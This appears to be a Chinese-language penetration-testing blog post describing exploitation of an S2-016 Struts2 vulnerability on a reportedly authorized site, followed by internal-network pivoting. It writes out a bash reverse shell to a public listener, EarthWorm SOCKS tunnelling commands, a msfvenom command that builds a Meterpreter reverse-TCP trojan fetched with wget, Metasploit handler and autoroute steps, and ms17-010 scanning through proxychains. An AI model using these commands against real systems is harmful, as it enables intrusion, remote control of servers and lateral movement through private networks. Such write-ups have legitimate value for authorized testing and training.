前言
在测试某授权网站时发现该系统存在S2-016漏洞。

查看文件发现对应不上访问的域名。
选择使用linux反弹shell的方式获取会话。。通过文件上传写入bash语句,执行后来反弹shell。
上传到指定路径并执行。

在自己公网服务器上使用nc开始监听。。

公网IP:nc -lvp 8080
bash反弹:bash -i >& /dev/tcp/xxx.xxx.xxx.xxx/8080 0>&1
这样就可以获取一个shell。
发现该系统为linux。只有普通权限。(就不提权啦)
内网渗透
这里使用ew工具进行代理。。
下载地址:
http://rootkiter.com/EarthWorm/
注:下载需要ss
公网IP: ./ew_linux_x64 -s rcsocks -l 1080 -e 1024
通过访问公网1080端口,将流量转发至1024端口。
shell服务器:./ew_linux_x64 -s rssocks -d 公网IP -e 1024
反弹到公网的1024端口上。
即可代理进入内网。。
注意端口的占用,及时结束linux进程。
可以使用proxifier进行配置为自己公网IP,1080端口。
使用端口扫描器简单扫描一下端口。

看到445端口,检测一下ms17-010

也可以浏览器访问web页面。。
linux系统监控zabbix。。

proxychains
也可以使用kali的proxychains工具进行代理访问内网。
cat /etc/proxychains.conf
可进行配置,这里配置为公网IP,1080端口。(和proxifier工具一样配置)

就可以使用nmap和msfconsole进行扫描内网啦。。
proxychains nmap -Pn -sT -sV -v -T4 内网IP
proxychains msfconsole
metasploit
使用msfvenom生成linux木马
msfvenom -p linux/x64/meterpreter/reverse_tcpLHOST=xx.xx.xxx.xxx LPORT=2333 -f elf >/root/sa.elf
将木马放在公网/var/www/html下。使用linux的wget命令进行远程下载并执行。。

在映射到公网的kali下使用msf,进行反弹

use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lhost 127.0.0.1
run

可以看到服务器为linux。。

run get_local_subnets 获取当前网段
run autoroute -s 10.0.1.0/24 添加路由
run autoroute -p 路由查询
使用msf的模块扫描一下网段的ms17-010漏洞。。

网友评论